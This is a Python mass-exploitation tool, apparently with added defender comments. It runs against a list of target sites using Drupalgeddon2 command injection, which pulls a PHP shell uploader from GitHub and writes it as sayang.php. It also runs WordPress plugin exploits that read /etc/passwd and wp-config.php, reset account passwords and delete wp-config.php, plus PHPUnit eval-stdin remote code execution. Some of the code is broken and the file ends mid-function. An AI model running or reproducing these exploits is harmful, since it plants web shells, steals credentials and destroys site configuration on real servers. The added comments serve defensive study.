- import urllib3, requests, os, sys, re, json
- from requests.packages.urllib3.exceptions import InsecureRequestWarning
- import base64
- import random
- import string
- requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
- from multiprocessing.dummy import Pool as ThreadPool
- from time import time as timer
- from platform import system
- from colorama import Fore
- from colorama import Style
- from pprint import pprint
- from colorama import init
- import urllib
- from bs4 import BeautifulSoup
# Console colour/style shortcuts used by the status lines printed throughout.
- fr = Fore.RED
- fc = Fore.CYAN
- fw = Fore.WHITE
- fg = Fore.GREEN
- sd = Style.DIM
- sn = Style.NORMAL
- sb = Style.BRIGHT
# Start-up: clear the terminal, print the banner, then read the file named by
# the operator into `woh`, one entry per line. `woh` is the work list that
# Main() maps over Run_Work(), so every line is treated as a target site.
# An IOError while opening or reading the file is ignored here.
- try:
- os.system('clear')
- print ("""
- ____ ___ ______ _____ ___
- | \ / \ | T| T / _]
- | o )Y Y| |l__/ | / [_
- | T| O |l_j l_j| __jY _]
- | O || | | | | / || [_
- | |l ! | | | || T
- l_____j \___/ l__j l_____jl_____j
- > Dann Kowalskyi ~ Zekkel DeBleau ~ Family Attack Cyber <
- """)
- ganteng = input('ur files => ')
- f= open(ganteng, 'r')
- woh = f.read().splitlines()
- except IOError:
- pass
- woh = list((woh))
# Prints the ASCII-art banner. The bare `sd` expression on the first body line
# evaluates the style constant and discards it, so it has no effect on output.
- def banner():
- sd
- print ("""
- ____ ___ ______ _____ ___
- | \ / \ | T| T / _]
- | o )Y Y| |l__/ | / [_
- | T| O |l_j l_j| __jY _]
- | O || | | | | / || [_
- | |l ! | | | || T
- l_____j \___/ l__j l_____jl_____j
- > Zekkel AR ~ Family Attack Cyber <
- """)
# Normalises one target entry: a value without '://' gets 'http://' prepended,
# anything else is returned unchanged. Bare host names are therefore probed
# over plain HTTP.
- def Domains(url):
- if '://' not in url:
- return "http://" + url
- else:
- return url
# Drupal 8 probe through the `timezone` element of the user-registration form
# (the status line it prints is "DRUPAL 8 ... TIMEZONE").
# What a targeted server sees: three POSTs to
#   /user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax
# each with form_id=user_register_form and a `timezone[a][#lazy_builder]` pair
# naming passthru plus a shell command: `uname -a`, then two curl downloads of
# uploader.php from raw.githubusercontent.com written as sayang.php (current
# directory, then /sites/default/files/). All three POSTs are issued before the
# first response is examined, so every scanned host receives the download
# attempts as well.
# Defender view: look for request parameter names containing `[#lazy_builder]`
# on /user/register, for fetches of that GitHub URL originating from the web
# server, and for a new file named sayang.php. Patched Drupal core releases
# sanitise request keys that begin with '#'.
# The tool treats "Linux" in the first response as proof of command execution
# and the string 'Avinash Kumar Thapa' in the fetched page as proof the file
# landed; results are appended to drupal_vuln.txt in its working directory.
# NOTE(review): the nesting of the if/else branches cannot be recovered from
# this flattened paste.
- def timezone(site):
- try:
- url = Domains(site)
# check uname output
- command = ('uname -a')
- data1 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data2 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command}
- ambush = requests.post(data1, data=data2, timeout=5).text
# check write to the current ("home") directory
- command2 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php')
- data3 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data4 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command2}
- jembit = requests.post(data3, data=data4, timeout=5).text
- kontoool = requests.get(url+'/sayang.php')
# check write to the default files directory
- command3 = ('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php')
- data100 = url+'/user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- data200 = {'form_id':'user_register_form','_drupal_ajax':'1','timezone[a][#lazy_builder][]':'passthru','timezone[a][#lazy_builder][][]':command3}
- pepek = requests.post(data100, data=data200, timeout=5)
- kontiil = requests.get(url+'/sites/default/files/sayang.php')
- if 'Linux' in ambush:
- print('{}[ {}VULNERABLE {}] {} {}{} [ {}DRUPAL 8 {}] {}[ {}TIMEZONE {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- print(' {}[ {}+ {}] {}Exploiting....' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in kontoool:
- print(' [ + ] Exploit Success {}/sayang.php' .format(url))
- open('drupal_vuln.txt', 'a').write(url+'/sayang.php')
- else:
- print(' {}[ {}+ {}] {}Exploit Failed, Home DIR RED' .format(fc,fr,fc,fr))
- print(' {}[ {}i {}] {}Checking Dir Writable /sites/default/files' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in kontiil:
- print(' [ + ] Success {}/sites/default/files/sayang.php')
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
- else:
- print(' {}[ {}+ {}] {}Exploit Failed ' .format(fc,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- #DRUPALGEDDON MAIL
# Drupal 8 probe through the `mail` element of the user-registration form (the
# comment above this function labels it "DRUPALGEDDON MAIL").
# What a targeted server sees: POSTs to
#   /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
# with form_id=user_register_form, `mail[#post_render][]`=passthru,
# `mail[#type]`=markup and the shell command in `mail[#markup]`. This function
# posts the `uname -a` payload and the `curl ... -o sayang.php` payload, then
# requests /sayang.php.
# Defender view: parameter names containing `[#post_render]`, `[#type]` or
# `[#markup]` on /user/register are the request signature; a sayang.php file or
# a fetch of the raw.githubusercontent.com uploader URL from the web server
# indicates the command ran. A line in the tool's drupal_vuln.txt only records
# what the tool believed, not what actually happened on the host.
# NOTE(review): the nesting of the if/else branches cannot be recovered from
# this flattened paste.
- def mail(site):
- try:
- url = Domains(site)
- command = ('uname -a')
- url1 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':command}
- ambush2 = requests.post(url1, data=payload, timeout=5).text
- url2 = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php'}
- ambuz = requests.post(url2, data=payload2, timeout=5).text
- bla = requests.get(url+'/sayang.php')
- cekdir = url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- hajar = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]':'curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php'}
- kontill = url+'/sites/default/files/sayang.php'
- if 'Linux' in ambush2:
- print('{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 8 {}] {}[ {}MAIL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr,fr,fc,fr))
- print(" {} [ {}+ {}] {}Exploiting ... " .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in bla:
- print(" [ + ] Exploit Success ... ")
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print(' {} [ {}+ {}] {}Exploit Failed, Dir RED in home Directory' .format(fc,fr,fc,fg))
- print(" [ + ] CHECKING In dir /sites/default/files")
- if 'Avinash Kumar Thapa' in kontill:
- print(' [ + ] Exploiting Success --> {}/sites/default/files/sayang.php')
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php')
- else:
- print(' {}[ {}i {}] {}Exploiting Failed, No Writable Dir' .format(fc,fr,fc,fr))
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Disabled code: everything between the two triple-quote lines below is a
# string literal and is never executed. It holds an older `drupal7` probe that
# posts the same `mail[#post_render]` / `uname -a` payload with TLS certificate
# verification switched off and a desktop Chrome user-agent string.
- """
- def drupal7(site):
- url = Domains(site)
- verify = False
- header = headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'passthru', 'mail[#type]': 'markup', 'mail[#markup]': 'uname -a'}
- url2 = (url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax')
- ea = requests.post(url2, data=payload, headers = header, verify=verify, timeout=5).text
- try:
- if 'Linux' in ea:
- print("{}{} --> {} vuln[{}] --> drupal7" .format(fg,url,fc,ea))
- print("[ + ] Exploiting ....")
- kampank = (url)
- open('drupal_vuln.txt', 'a').write(url + "\n")
- else:
- print("{}{} --> {} not vuln" .format(fg,url,fr))
- except requests.exceptions.ConnectTimeout:
- print("[ i ] {}{} CONNECTION TIMEOUT" .format(fw,url))
- except Exception as e:
- #print (e)
- print ("{} Something was wrong !" .format(url))
- """
# Drupal 7 two-request sequence that tries to write sayang.php into the current
# directory. Run_Work() does not call it; the only reference in this paste is a
# commented-out call inside drupal7_1().
# Request 1: POST to ?q=user/password with `name[#post_render][]`=system,
#   `name[#markup]`=<curl download command> and `name[#type]`=markup in the
#   query string, and form_id=user_pass / _triggering_element_name=name in the
#   body. The form_build_id is scraped from the returned HTML.
# Request 2: POST to ?q=file/ajax/name/%23value/<form_build_id> carrying that
#   form_build_id.
# Defender view: the pairing of a user/password request whose query string
# contains `name[#post_render]` (raw or %23-encoded) with an immediately
# following file/ajax/name/%23value/ POST from the same client is the log
# signature. All requests here skip TLS certificate verification.
- def upshell(site):
- url = Domains(site)
- print(" [ + ] Exploiting ...")
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sayang.php').text
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
- else:
- print('{} [ + ] Exploiting Failed --> {}{}' .format(fg,fr,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
# Variant of upshell() whose command redirects the download to
# /sites/default/files/sayang.php and then requests that path. Like upshell(),
# it is not called by Run_Work() in this paste.
# It uses the same Drupal 7 request pair: ?q=user/password with
# `name[#post_render][]`=system in the query string, then
# ?q=file/ajax/name/%23value/<form_build_id>.
# Defender view: in addition to the request signature, check
# sites/default/files for unexpected .php files. That directory normally holds
# uploads only, so executing PHP from it can be denied at the web-server level.
- def writable(site):
- try:
- url = Domains(site)
- print(' {}[ + ] Checking Dir Writable' .format(fg))
- pass
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sites/default/files/sayang.php').text
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fg,url))
- else:
- print('{} [ + ] Exploiting Failed, No Dir Writable--> {}' .format(fg,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# The Drupal 7 check that Run_Work() actually runs. It repeats the
# ?q=user/password -> ?q=file/ajax/name/%23value/<form_build_id> request pair
# up to three times per target, with `name[#post_render][]`=system and a
# different command each time: `uname -a`, a curl download redirected to
# /sites/default/files/sayang.php, and a curl download written with
# `-o sayang.php`. It then requests both sayang.php locations.
# TLS certificate verification is disabled on the POSTs (verify = False).
# Defender view: one client issuing several user/password requests whose query
# strings carry `name[#post_render]`, each followed by a file/ajax POST, then
# GETs for sayang.php, matches this function. A host that answered the first
# pair with kernel information should be treated as having executed commands
# and triaged accordingly (new files under the web root and
# sites/default/files, outbound fetches of the raw.githubusercontent.com URL).
# Results are appended to drupal_vuln.txt in the tool's working directory.
# NOTE(review): the nesting of the if/else branches cannot be recovered from
# this flattened paste.
- def drupal7_1(site):
- try:
- url = Domains(site)
# Request pair 1: `uname -a`
- kentot = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=uname -a&name[%23type]=markup')
- data = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- r = requests.post(kentot,data = data,verify = False,timeout = 5)
- result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
- if result:
- found = result.group(1)
- url2= url + '?q=file/ajax/name/%23value/'+found
- data = {'form_build_id' : found}
- r = requests.post(url2,data = data,verify = False,timeout = 5).text
# Request pair 2: download redirected into /sites/default/files/
- kentot2 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php > /sites/default/files/sayang.php&name[%23type]=markup')
- data6 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re2 = requests.post(kentot2,data = data6,verify = False,timeout = 5)
- result2 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re2.text)
- if result2:
- found3 = result2.group(1)
- url23 = url+'?q=file/ajax/name/%23value/'+found3
- data1 = {'form_build_id' : found3}
- babi = requests.post(url23, data=data1, verify = False, timeout=5)
- cek = requests.get(url+'/sites/default/files/sayang.php').text
- else:
- pass
# Request pair 3: download written to the current directory
- kentot3 = (url+'?q=user/password&name[%23post_render][]=system&name[%23markup]=curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o sayang.php&name[%23type]=markup')
- data7 = {
- 'form_id':'user_pass',
- '_triggering_element_name':'name'
- }
- re3 = requests.post(kentot3,data = data7,verify = False,timeout = 5)
- result3 = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', re3.text)
- if result3:
- found4 = result3.group(1)
- url234 = url+'?q=file/ajax/name/%23value/'+found4
- data2 = {'form_build_id' : found4}
- babi = requests.post(url234, data=data2, verify = False, timeout=5)
- cek1 = requests.get(url+'/sayang.php').text
- else:
- pass
# Verdict: "Linux" in the first pair's response is taken as command execution
- if 'Linux' in r:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}DRUPAL 7 {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- print(" {} [ {}+ {}] {}Exploiting" .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in cek:
- print("{} [ + ] Exploit Success --> {}/sites/default/files/sayang.php" .format(fg,url))
- open('drupal_vuln.txt', 'a').write(url+'/sites/default/files/sayang.php'+"\n")
- else:
- print('{} [ {}+ {}] {}Exploiting Failed, {}[ {}NO DIR WRITABLE {}]' .format(fc,fr,fc,fc,fc,fr,fc))
- print("{} [ i ] Checking in Home Directory.." .format(fg))
- if 'Avinash Kumar Thapa' in cek1:
- print("{} [ + ] Exploit Success --> {}/sayang.php" .format(fc, url))
- open('drupal_vuln.txt', 'a').write(url+'/sayang.php'+"\n")
- else:
- print("{} [ + ] Exploit Failed DIR RED " .format(fr))
- open('drupal_vuln.txt', 'a').write(url+"\n")
- # upshell(url)
- #writable(url)
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
- #print("{}[ i ] {}{} --> URL ERROR" .format(fw,fw,url))
# WordPress account-name lookup used by wp_reset(). It POSTs
# action=cs_employer_ajax_profile with cs_uid values 0 through 4 to
# /wp-admin/admin-ajax.php and pulls `display_name` field values out of the
# response with a regex, returning the first one it finds.
# Defender view: unauthenticated admin-ajax.php POSTs that step through small
# cs_uid values are the log signature. An AJAX action that returns profile data
# without an authentication or nonce check is the underlying weakness.
# NOTE(review): which plugin or theme registers this action is not stated on
# the page.
- def enum(site):
- try:
- url = Domains(site)
- for i in range(5):
- enum = urllib.parse.urlencode({'cs_uid': i, 'action': 'cs_employer_ajax_profile'})
- data = requests.post(url + "/wp-admin/admin-ajax.php", data=enum, headers=headers, verify=False, timeout=3)
- login = re.findall(r'name="display_name" value=\"(.*?)\"',str(data.content))
- for user in login:
- return user
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Local-file-read check against the wp-with-spritz WordPress plugin: a GET to
# wp.spritz.content.filter.php with a `url` parameter that traverses to
# /etc/passwd. The response counts as a hit when it contains the root account
# line; the full request URL is then appended to the file `wp_spritz`.
# Defender view: any request to that plugin script whose `url` parameter holds
# `../` sequences or an absolute filesystem path is suspicious. Removing or
# updating the plugin closes the issue, and a confirmed hit means any file
# readable by the web-server account may have been disclosed.
- def wp_spritz(site):
- try:
- url = Domains(site)
- exploit = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd"
- blank = requests.get(url+exploit, timeout=5)
- if blank.status_code == 200:
- print ("[ + ] STATUS CODE 200OK... EXPLOITING")
- if 'root:x:0:0:root:/root:/bin/bash' in blank.text:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP SPRITZ {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('wp_spritz', 'a').write(url + exploit + "\n")
- else:
- print ("{}[ + ] EXPLOITING FAILED" .format(fc))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Path-traversal check against a CSV export endpoint: a GET to
# /wordpress/wp-admin/edit.php with post_type=wd_ads_ads, export=export_csv and
# path=../wp-config.php. 'DB_NAME' in the response is treated as proof that
# wp-config.php was returned; the request URL is appended to ad_manager.txt.
# Defender view: a hit discloses the database credentials and the
# authentication keys/salts held in wp-config.php, so response to a confirmed
# request of this shape includes rotating those secrets, not just patching the
# plugin that registers the export handler.
- def ad_manager(site):
- try:
- url = Domains(site)
- exploit = '/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php'
- blank = requests.get(url+exploit, timeout=5).text
- if 'DB_NAME' in blank:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}AD MANAGER {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('ad_manager.txt', 'a').write(url + exploit + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Checks whether the CherryFramework theme's download_backup.php script answers
# an unauthenticated GET with status 200. On a 200 it prompts the operator for
# a file name and opens `<name>.mp3` for binary writing.
# Defender view: theme and plugin admin scripts should not be reachable without
# an authenticated session. Requests for
# /wp-content/themes/CherryFramework/admin/data_management/download_backup.php
# from clients with no WordPress session cookie are the log signature, and a
# served backup archive can contain the full site content and configuration.
# This request is sent without a timeout.
- def backup(site):
- try:
- url = Domains(site)
- exploit = '/wp-content/themes/CherryFramework/admin/data_management/download_backup.php '
- blank = requests.get(url+exploit, stream=True)
- if blank.status_code == 200:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}BACKUP {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- tai = input('name file => ')
- print ("{}{} Downloading File...." .format(url))
- with open(tai + '.mp3','wb') as f:
- for i in r.iter_content(1024):
- if i:
- f.write(i)
- f.flush
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# State-changing WordPress action: takes a login name from enum(), then POSTs
# action=cs_reset_pass with a hard-coded new password to
# /wp-admin/admin-ajax.php. A response containing the CSS class
# 'icon-checkmark6' with status 200 is treated as success, and
# url|login|password is appended to reset_success.txt.
# Defender view: this is not a passive check. A successful request changes a
# real account's password. Indicators are unauthenticated admin-ajax.php POSTs
# with action=cs_reset_pass, users reporting sudden lock-out, and logins using
# the fixed password that appears in this script. Affected accounts need a
# forced reset and session invalidation once the vulnerable component is
# removed or patched.
- def wp_reset(site):
- try:
- url = Domains(site)
- login = enum(site)
- pw = "rdcl@hxr000"
- reset = urllib.parse.urlencode({'new_pass': pw, 'confirm_new_pass': pw, 'user_login': login, 'action': 'cs_reset_pass'})
- data = requests.post(url + "/wp-admin/admin-ajax.php", data=reset, headers=headers, verify=False, timeout=3)
- res = re.findall(r'<i class=\"(.*?)\"',str(data.content))
- for i in res:
- if i == str('icon-checkmark6') and data.status_code == 200:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP RESET {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('reset_success.txt', 'a').write(url + "|" + login + "|" + pw + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Destructive WordPress action: POSTs action=arf_delete_file with a file_name
# that traverses to wp-config.php, then loads /wp-admin and looks for the
# WordPress setup form. The setup form appearing is taken as proof that the
# configuration file was deleted; the site URL is appended to arforms_del.txt.
# Defender view: a site that unexpectedly shows the WordPress installer has
# lost wp-config.php and is exposed to re-installation by whoever reaches the
# installer first. Take it offline or restrict access, restore the file from
# backup, and look for admin-ajax.php POSTs with action=arf_delete_file in the
# access log. The handler should reject path separators in file_name and
# require an authenticated, nonce-checked request.
- def Arforms_config(site):
- try:
- url = Domains(site)
- payload = {
- "action":"arf_delete_file",
- "file_name":"../../../../wp-config.php"
- }
- r = requests.post(url + "/wp-admin/admin-ajax.php", data=payload, headers=headers, timeout=3)
- sh = requests.get(url + "/wp-admin").text
- if 'id="setup" method="post" action="?step=0' in sh:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}ARFORMS CONFIG {}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('arforms_del.txt', 'a').write(url + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Looks for an unfinished WordPress installation: requests
# /wp-admin/setup-config.php under '/', '/new', '/wp' and '/wordpress', and
# records the URL in wp_install.txt when the page links to
# setup-config.php?step=1.
# Defender view: an installer left reachable lets any visitor complete the
# setup with their own database and admin account. Finish or remove abandoned
# installs, and treat scans for setup-config.php across these sub-paths as
# reconnaissance for that condition.
- def wp_install(site):
- try:
- url = Domains(site)
- list_path = ['/','/new', '/wp', '/wordpress']
- for path in list_path:
- check = requests.get(url + path + "/wp-admin/setup-config.php" ,headers=headers, timeout=3).text
- if '<a href="setup-config.php?step=1' in check:
- print("{}[ {}VULNERABLE {}] {}{} {}[ {}WP INSTALL{}]" .format(fr,fc,fr,fg,url,fr,fc,fr))
- open('wp_install.txt', 'a').write(url + path + "/wp-admin/setup-config.php" + "\n")
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
- print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
# Check for a web-reachable PHPUnit eval-stdin.php (the status line labels hits
# "LARAVEL"). It POSTs a PHP snippet that runs `uname -a` to
# /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, sends a second snippet
# that downloads uploader.php as muach.php, then requests muach.php from the
# same vendor directory. Hits are appended to php_unit.txt.
# Defender view: POST requests to any path ending in
# vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php with a body starting with
# `<?php` are the signature. The durable fixes are keeping vendor/ outside the
# document root (or denying web access to it), not deploying development
# dependencies to production, and updating PHPUnit. On a suspected hit, look
# for muach.php and other new .php files under vendor/.
- def phpunit(site):
- try:
- url = Domains(site)
- op = url+'/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'
- cekos = "<?php system('uname -a');?>"
- upshell = '<?php system("curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o muach.php"); ?>'
- b = requests.post(op, data=cekos, timeout=5).text
- t = url+'/vendor/phpunit/phpunit/src/Util/PHP/muach.php'
- da=requests.post(url, data=upshell, timeout=5)
- bbb = requests.get(t).text
- if 'Linux' in b:
- print('{}[ {}VULNERABLE {}]{} {} {}[ {}LARAVEL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr))
- print(' {}[ {}+ {}] {}Exploiting...' .format(fr,fc,fr,fc))
- if 'Avinash Kumar Thapa' in bbb:
- print('{}[{}+{}]{}{} [ {}SUCCESS {}]{}[{}LARAVEL{}]' .format(fr,fc,fr,fg,url,fc,fg,fc,fg,fc))
- open('php_unit.txt', 'a').write(url + "\n")
- else:
- print('{} [ {}- {}] {}Exploit Failed' .format(fc,fr,fc,fr))
- else:
- print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
- except requests.exceptions.ConnectTimeout:
- print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
- except Exception as e:
